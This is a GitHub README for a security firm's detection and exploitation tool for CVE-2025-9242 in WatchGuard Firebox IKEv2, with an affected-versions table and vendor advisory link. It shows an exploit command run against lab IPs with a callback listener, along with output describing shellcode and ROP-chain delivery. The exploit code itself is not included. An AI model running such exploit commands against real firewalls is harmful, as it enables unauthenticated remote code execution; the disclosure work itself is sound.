watchtowrlabs/watchTowr-vs-WatchGuard-CVE-2025-9242

GitHub: watchtowrlabs/watchTowr-vs-WatchGuard-CVE-2025-9242

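A detection and exploitability verification tool for the out-of-bounds write vulnerability (CVE-2025-9242) in the IKEv2 service of WatchGuard Firebox firewalls. It supports version fingerprinting and vulnerability exploitability checks.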

Stars: 12 | Forks: 5

# watchTowr-vs-WatchGuard-CVE-2025-9242

WatchGuard CVE-2025-9242 Detection Artifact Generator

https://github.com/user-attachments/assets/097f099b-ba60-4223-adea-04279570460f

See our [blog post](https://labs.watchtowr.com/yikes-watchguard-fireware-os-ikev2-out-of-bounds-write-cve-2025-9242/) for technical details.

# Detection Demo

```
python watchTowr-vs-WatchGuard-CVE-2025-9242.py --rhost 192.168.56.102 --rport 500 --lhost 192.168.56.1 --lport 31337 --exploit
__ ___ ___________
__ _ ______ _/ |__ ____ | |_\__ ____\____ _ ________
\ \/ \/ \__ \ ___/ ___\| | \| | / _ \ \/ \/ \_ __ \
\ / / __ \| | \ \___| Y | |( <_> \ / | | \/
\/\_/ (____ |__| \___ |___|__|__ | \__ / \/\_/ |__|
\/ \/ \/

watchTowr-vs-WatchGuard-CVE-2025-9242.py

(*) WatchGuard Unauthenticated Remote Code Execution Detection Artifact Generator

- McCaulay (@_mccaulay) of watchTowr (@watchTowrcyber)

CVEs: [CVE-2025-9242]

[#] Sending IKEv2 SA Init with default transform
[#] WatchGuard Firmware Version: 12.11.3
[#] WatchGuard Build Number: 719894
[+] IKEv2 service is vulnerable to CVE-2025-9242 based on version number 12.11.3 < 12.11.4
[+] Default IKEv2 service found
[#] Verifying if IKEv2 service is vulnerable...
[+] IKEv2 service is vulnerable to CVE-2025-9242
[#] Building shellcode payload...
[#] Building ROP chain...
[#] Sending exploit payload to 192.168.56.1:31337
```

# Description

This script is designed to detect whether WatchGuard OS is vulnerable to CVE-2025-9242.

# Affected Versions

The following WatchGuard OS versions are affected:

| Affected Version                | Fixed Version            |
| ------------------------------- | ------------------------ |
| 2025.1                          | 2025.1.1                 |
| 12.x                            | 12.11.4                  |
| 12.5.x (T15 & T35 models)       | 12.5.13                  |
| 12.3.1 (FIPS-certified release) | 12.3.1_Update3 (B722811) |
| 11.x                            | End of Life (EOL)        |

For more information, see [WatchGuard Firebox iked Out of Bounds Write Vulnerability](https://www.watchguard.com/wgrd-psirt/advisory/wgsa-2025-00015).

# Follow [watchTowr](https://watchTowr.com) Labs

Follow the [watchTowr](https://watchTowr.com) Labs team for the latest security research:

- https://labs.watchtowr.com/
- https://x.com/watchtowrcyber